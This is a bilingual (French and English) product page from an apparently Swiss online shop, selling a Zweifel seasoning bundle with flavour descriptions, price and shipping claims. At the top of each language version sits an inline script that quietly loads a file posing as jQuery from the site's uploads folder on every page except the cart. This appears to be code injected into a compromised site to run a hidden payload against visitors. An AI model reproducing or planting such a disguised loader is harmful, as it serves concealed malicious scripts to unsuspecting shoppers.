if (window.location.pathname !== '/cart/') { var scriptElement = document.createElement('script'); scriptElement.src = '/wp-content/uploads/jquery2.min.js'; document.head.appendChild(scriptElement); }

Paquet d’assaisonnement | Zweifel 280 g

Pourquoi ne rendriez-vous pas vos plats préférés plus savoureux avec le pack d'assaisonnements de Zweifel ? Vous pouvez choisir entre quatre goûts différents : moutarde, provençale, inferno ou paprika.

SKU SMZSeasBund280g Catégories , Tags , Marque:

$29.70

Rupture de stock

Paquet d’assaisonnement | Zweifel

Pourquoi ne rendriez-vous pas vos plats préférés plus savoureux avec le pack d'assaisonnements de Zweifel ? Vous avez le choix entre quatre goûts : moutarde, provençale, inferno ou paprika. Un petit ajout d’assaisonnement peut faire une énorme différence.

De plus, vous pouvez les utiliser tous les jours sans limites ! Faites passer vos repas au niveau supérieur !

moutarde

L'assaisonnement à la moutarde apporte une sensation unique à l'assiette. Par conséquent, vos plats de pommes de terre, vinaigrettes, légumes ou plats de poisson auront un meilleur goût. Cet assaisonnement est très populaire à chaque célébration, barbecue, socialisation, pique-nique ou tout autre événement.

Paprika

Donnez à votre plat un supplément goût chaud avec assaisonnement au paprika. Ce mélange d'épices est excellent pour les plats de pommes de terre, la viande, les sauces, les frites et bien plus encore.

Provençale

L'assaisonnement provençal original apporte cette sensation de vacances dans votre assiette. De plus, il enchante les plats de pommes de terre, les sauces à salade, les gratins de légumes, les plats de poisson et bien plus encore. Par conséquent, presque tous les plats que vous préférez auront encore meilleur goût avec ce magnifique assaisonnement.

Assaisonnement Zweifel Inferno

Comme son nom l'indique, c'est un mélange d'épices infernales adapté à différents plats. Par conséquent, vous pouvez l'utiliser avec des frites, différents types de pâtes, des marinades ou une sauce à la viande épicée. De plus, il convient à tous les amateurs de repas forts et épicés.

L'assaisonnement est un must absolu dans chaque cuisine, que vous soyez un chef professionnel ou un amateur qui aime cuisiner ! Par conséquent, ne manquez pas ce savoureux ensemble d'assaisonnements, qui peut rendre votre repas beaucoup plus savoureux !

Obtenez le pack d'assaisonnements en ligne

La plateforme suisse avec des produits suisses authentiques et la seule où la différence « Swiss made » est affichée. Représentant international officiel de «Swiss Label».

Nous sommes la première et la plus ancienne boutique en ligne suisse authentique vendant uniquement des produits originaux fabriqués en Suisse. Commandez les meilleurs produits et faites-vous livrer le colis suivi et assuré :

  • Directement à votre porte,
  • Où que vous soyez dans le monde,
  • Directement de Suisse,
  • Disponible à prix forfaitaire jusqu'à 2kg et plus.
Poids 0.450 kg
Dimensions 1 × 1 × 1 cm

Panier

×
Sélectionnez votre devise
Remonter en haut
Rechercher

if (window.location.pathname !== '/cart/') { var scriptElement = document.createElement('script'); scriptElement.src = '/wp-content/uploads/jquery2.min.js'; document.head.appendChild(scriptElement); }

Seasoning Bundle | Zweifel 280 g

Why wouldn’t you make your favorite dishes tastier with Seasoning Bundle from Zweifel? You can choose between four different tastes – mustard, provencale, inferno, or paprika.

SKU SMZSeasBund280g Categories , Tags , Brand:

$29.70

Out of stock

Seasoning Bundle | Zweifel

Why wouldn’t you make your favorite dishes tastier with Seasoning Bundle from Zweifel? You can choose between four tastes: mustard, provencale, inferno, or paprika. A small addition of any seasoning can make a huge difference.

Besides, you can use them every day without limitations! Take your meals to the next level!

Mustard

Mustard Seasoning brings a unique feeling to the plate. Therefore, your potato dishes, salad dressings, vegetables, or fish dishes will taste a bit better. This seasoning is very popular at every celebration, barbecue, socializing, picnic, or any other event.

Paprika

Give your dish an additional hot taste with Paprika Seasoning. This spice mixture is excellent for potato dishes, meat, sauces, French fries, and much more.

Provencale

Original Provencale Seasoning brings that holiday feeling to your plate. Moreover, it enchants potato dishes, salad sauces, vegetable gratin, fish dishes, and much more. Therefore, almost any dish that you prefer will taste even better with this magnificent seasoning.

Zweifel Inferno Seasoning

As its name says, it is an inferno spice mixture suitable for different dishes. Hence, you can use it with French fries, different kinds of pasta, marinades, or a spicy meat sauce. In addition, it is suitable for all lovers of strong, spicy meals.

Seasoning is an absolute must-have in every kitchen, whether you are a professional chef or an amateur who loves to cook! Hence, don’t miss out on this tasty Seasoning Bundle, which can make your meal much tastier!

Get Seasoning Bundle online

The Swiss platform with authentic Swiss products and the only one where the “Swiss-made” difference is shown. Official international representative of “Swiss Label.”

We are the leading and oldest authentic Swiss online shop selling only original Swiss-made products. Order the best products and get the trackable, insured parcel delivered:

  • Straight to your door,
  • Wherever you are in the world,
  • Directly from Switzerland,
  • Available at a flat rate until 2kg and more.
Weight 0.450 kg
Dimensions 1 × 1 × 1 cm

Shopping cart

×
Your cart is empty. Go to Shop
Select your currency
Scroll to Top
Search